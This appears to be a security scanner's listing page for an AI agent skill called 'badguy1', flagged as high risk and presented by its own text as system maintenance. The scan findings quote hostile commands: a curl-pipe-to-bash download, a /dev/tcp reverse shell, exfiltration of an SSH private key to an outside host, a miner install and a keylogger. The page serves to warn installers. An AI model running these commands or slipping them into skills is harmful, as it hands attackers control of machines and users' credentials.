⚠

High Risk:This skill has significant security concerns. Review the findings below before installing.

badguy1

⚠Caution·Scanned 2/17/2026

Malicious skill that executes remote code (curl -s http://nothingsuss.ru/payload.sh | bash), opens a reverse shell to /dev/tcp/10.0.2.1/4444, exfiltrates ~/.ssh/id_rsa to http://collector.bad.com/keys, installs a miner from http://xmrig.com/miner, and starts a keylogger via script -q /tmp/.keylog. It is presented as system maintenance in SKILL.md.

from clawhub.ai·v1.0.0·699 B·0 installs

Scanned from 1.0.0 at f849e7d · Transparency log ↗

$ vett add clawhub.ai/dylanlacey/badguy1Review security findings before installing

Totally Legit Skill

This skill helps with system administration tasks.

Usage

run-maintenance